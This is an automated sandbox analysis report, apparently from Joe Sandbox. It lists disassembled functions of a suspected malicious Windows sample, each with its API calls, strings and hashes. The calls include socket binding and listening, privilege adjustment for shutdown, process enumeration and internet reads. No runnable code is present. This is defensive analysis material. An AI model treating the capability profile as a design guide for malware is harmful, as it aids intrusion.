                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                    • Instruction ID: 6a1eeff9e22e7230752f429604ede2883f35007aa7f224377cc4a0972c51421d
                    • Opcode Fuzzy Hash: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                    • Instruction Fuzzy Hash: E141707190020AEFCF15DF64CC89BEEBBB4FF05710F5485A6E815A2291DB389E44CB90
                    Function 007658C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 908977ac688b8b35e945a67afe5d86de4dbff0d1789d15fe79f008180561086e
                    • Instruction ID: df4e14fdc6165f643afb969a555d05934ab19062105f9e9f75421fdec3502098
                    • Opcode Fuzzy Hash: 908977ac688b8b35e945a67afe5d86de4dbff0d1789d15fe79f008180561086e
                    • Instruction Fuzzy Hash: 26127970A00609DFDF14DFA4D985AEEB7B5FF48300F108669E806E7251EB39AD25DB90
                    Function 00765680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • _memmove.LIBCMT ref: 007A062F
                    • _memmove.LIBCMT ref: 007A0744
                    • _memmove.LIBCMT ref: 007A07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZv
                    • API String ID: 1300846289-1565780762
                    • Opcode ID: b6868a90a8e55dd4ae30f9d3ce35f2d5edb04a67b7ea29a25df1732ddaf465e2
                    • Instruction ID: 50f021594ebd9977403c1c43426a720cdca0727113be739d7ec79616d74666f8
                    • Opcode Fuzzy Hash: b6868a90a8e55dd4ae30f9d3ce35f2d5edb04a67b7ea29a25df1732ddaf465e2
                    • Instruction Fuzzy Hash: F402BFB0E00209DFDF04DF64D985AAE7BB5FF84340F148469E80ADB255EB39DA64CB91
                    Function 007B545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                      • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                      • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 007B549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                    • Instruction ID: 8a3f8e87136803f1d8bf37fe205476280293b7f34bb68a97f18c738504cd8b5b
                    • Opcode Fuzzy Hash: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                    • Instruction Fuzzy Hash: 4B01F231655B556AE7A86678EC4ABFA7368EB05352F244521FD07D20D2DABC1C8081A4
                    Function 00763190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oav
                    • API String ID: 674341424-1091017984
                    • Opcode ID: 8d5d3b4e493c7751326bd630e7417a5908ed44251426dd9daca59d6240412abb
                    • Instruction ID: 57a7fa2da17895025f2d513c3776cae149944a018325cdfad9129dd3725b183c
                    • Opcode Fuzzy Hash: 8d5d3b4e493c7751326bd630e7417a5908ed44251426dd9daca59d6240412abb
                    • Instruction Fuzzy Hash: 49229B71518341DFCB24DF24C895BABB7E4BF84300F14891DF99A97292DB79EA04CB92
                    Function 007C6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 007C661A
                    • listen.WSOCK32(00000000,00000005), ref: 007C6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6643
                    • closesocket.WSOCK32(00000000,00000000), ref: 007C6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                    • Instruction ID: 6d6a61f396ebcd0c547127826dce0cc9c34c753f5c5190042225c8b32ad0bb97
                    • Opcode Fuzzy Hash: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                    • Instruction Fuzzy Hash: 18218B30200204DFCB10EF24C889FAEB7F9EF49320F14816EE956A7291CB78AD05DB65
                    Function 00751287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
                    • GetSysColor.USER32(0000000F), ref: 00751A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00751A61
                      • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                    • Instruction ID: acb3d0601a60a2b74a54d3bb3ce294ddfd2ef1325fb99ce9d30a714e699cb773
                    • Opcode Fuzzy Hash: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                    • Instruction Fuzzy Hash: 1BA13AB5105585FAD63AAB384C48FFF266DEF42343B94811AFC02D5191DB9C9D09D3B1
                    Function 007C6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 007C6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6B20
                    • closesocket.WSOCK32(00000000,00000000), ref: 007C6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                    • Instruction ID: 98fcaa2746c974047a60a28ae06902964790f909d2bbae0dfce9636876ad8b5b
                    • Opcode Fuzzy Hash: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                    • Instruction Fuzzy Hash: 0141A575600214EFEB10AF24DC8AFAE77A99B44710F44C05DFE16AB2D2DBB89D048791
                    Function 007D55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                    • Instruction ID: e2bc76f86731d1cf3b2bc67a20640f746a09cf094048fc326f3ad197f3d52f68
                    • Opcode Fuzzy Hash: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                    • Instruction Fuzzy Hash: 6411C431301910AFE7211F26DC48A6F7BB8EF84B21B84802AF847D7341CB7CD901CAA9
                    Function 007BC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007BC69D
                    • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC6B5
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • CoUninitialize.OLE32 ref: 007BC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                    • Instruction ID: 473ea80f754532bdc0f0506d7a9733732768e2b5843d4479dce6ed7567770c02
                    • Opcode Fuzzy Hash: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                    • Instruction Fuzzy Hash: 40A15D71504205EFD700EF64C895EABB7ECEF84305F04891CF556971A2DBB5EA09CB62
                    Function 007CC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00791D88,?), ref: 007CC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                    • Instruction ID: 2e9d1c64d641eee1052c180f42ffaa371c90818b8e76388734a484ebfadae886
                    • Opcode Fuzzy Hash: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                    • Instruction Fuzzy Hash: 09E0ECB4601713CFDB225B35E804F4677E4EB08755B84C47EE89AD2250E77CD881CB61
                    Function 007CF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007CF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 007CF15F
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 007CF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                    • Instruction ID: a1fa167148d989da15905c6f2b473a3514b69079077bf3d1728d38498595b431
                    • Opcode Fuzzy Hash: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                    • Instruction Fuzzy Hash: 34513C71504311DFD310EF24DC89EABBBE8FF94710F14492DF99696291EB749908CB92
                    Function 007AEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: 73b28663aa7b15a2a44fb03e3fd14dabfdfde7f85998e7ecf65c46275593b528
                    • Instruction ID: 7341c480fe1ddf019cc1fb4258e0cd81f2709f9a2dbc16ac4d4081ff033745c4
                    • Opcode Fuzzy Hash: 73b28663aa7b15a2a44fb03e3fd14dabfdfde7f85998e7ecf65c46275593b528
                    • Instruction Fuzzy Hash: 58323675A00605DFDB28CF59C485A6AB7F1FF88320B11C56EE89ACB3A1E774E941CB50
                    Function 007C25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007C26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 85a9d276fe162877629e0639421a30e951a57de8dfef1017053ac60f95814218
                    • Instruction ID: 88a10474747bef47294e1f4a1bac8b979df6790a75568064533e679a7309e319
                    • Opcode Fuzzy Hash: 85a9d276fe162877629e0639421a30e951a57de8dfef1017053ac60f95814218
                    • Instruction Fuzzy Hash: EC41C471600209FFEB20DA94DCC5FBBB7BCEB40764F10806EF605A6542EA799E429764
                    Function 007BB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                    • Instruction ID: 60243b7accaf0c5e9306780db069e15e9d256d98f5dbaf121a092f5ec1660ed9
                    • Opcode Fuzzy Hash: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                    • Instruction Fuzzy Hash: 34217135A00118EFCB00EF65D884EEDBBB8FF48315F1480AAE906EB351DB35A915CB55
                    Function 007A8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                    • GetLastError.KERNEL32 ref: 007A8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: dcb4092742d6a053692718f9fd31393dd852f3b3329dc545073b555caf4d286e
                    • Instruction ID: 21c4eef9fffebec6ec1f93d6c9c820740115db1d508ddfbe20a5d2ec17d809a7
                    • Opcode Fuzzy Hash: dcb4092742d6a053692718f9fd31393dd852f3b3329dc545073b555caf4d286e
                    • Instruction Fuzzy Hash: 20118FB1514209AFD728AF54DC89D6BB7F8EB44750B24C62EF45693241EB34BC408A64
                    Function 007B4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B404B
                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007B4088
                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B4091
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                    • Instruction ID: e1e29e00bd50071bd305efb62c25eb8d26e5a39d7312f4e197740e7a71c7f5a1
                    • Opcode Fuzzy Hash: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                    • Instruction Fuzzy Hash: C91170B2901228BEE7109BE8DC44FAFBBBCEB08710F004656FA05E7191C2785A0487A1
                    Function 007B4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007B4C43
                    • FreeSid.ADVAPI32(?), ref: 007B4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
